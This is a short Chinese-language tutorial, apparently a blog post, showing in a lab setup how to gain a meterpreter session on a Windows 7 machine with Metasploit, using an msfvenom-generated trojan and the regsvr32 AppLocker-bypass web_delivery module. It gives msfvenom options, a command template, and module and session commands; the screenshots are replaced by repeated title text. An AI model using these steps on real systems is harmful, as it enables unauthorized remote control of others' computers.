使用Metasploit渗透攻击windows系统(一)

时间:2022-02-22 21:22:16

攻击机:kaili

ip:192.168.80.157

目标机:win7

IP:192.168.80.158

这里用两种方法去创建meterpreter会话:

1)利用kali中的msfvenom生成木马,在目标机上运行,具体步骤如下:

常用参数:

-p 选择攻击的payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
一般格式:

msfvenom -p 指定攻击的payload LHOST=监听IP LPORT=监听端口 -f 输出的文件格式 -o 生成木马的文件名

生成木马

使用Metasploit渗透攻击windows系统(一)

设置监听

使用Metasploit渗透攻击windows系统(一)

待目标机运行刚刚生成的木马时,就会产生一个meterpreter会话

使用Metasploit渗透攻击windows系统(一)

使用Metasploit渗透攻击windows系统(一)

2)使用web_delivery模块(你也可以选择其他模块,过程都是相似的)

查看该模块可以使用的payload

使用Metasploit渗透攻击windows系统(一)

这里我们使用exploit/windows/misc/regsvr32_applocker_bypass_server

然后设置IP:set lhost 192.168.80.157

使用Metasploit渗透攻击windows系统(一)

最后运行:run,我们可以看到最下面出现一行命令,根据提示,复制这条命令到目标机上运行即可:

使用Metasploit渗透攻击windows系统(一)

在win7中运行该命令

使用Metasploit渗透攻击windows系统(一)

然后在kali中我们就可以看到已经成功监听,并且返回一个session:

使用Metasploit渗透攻击windows系统(一)

输入命令:sessions 1 既可以创建meterpreter会话,控制目标机

使用Metasploit渗透攻击windows系统(一)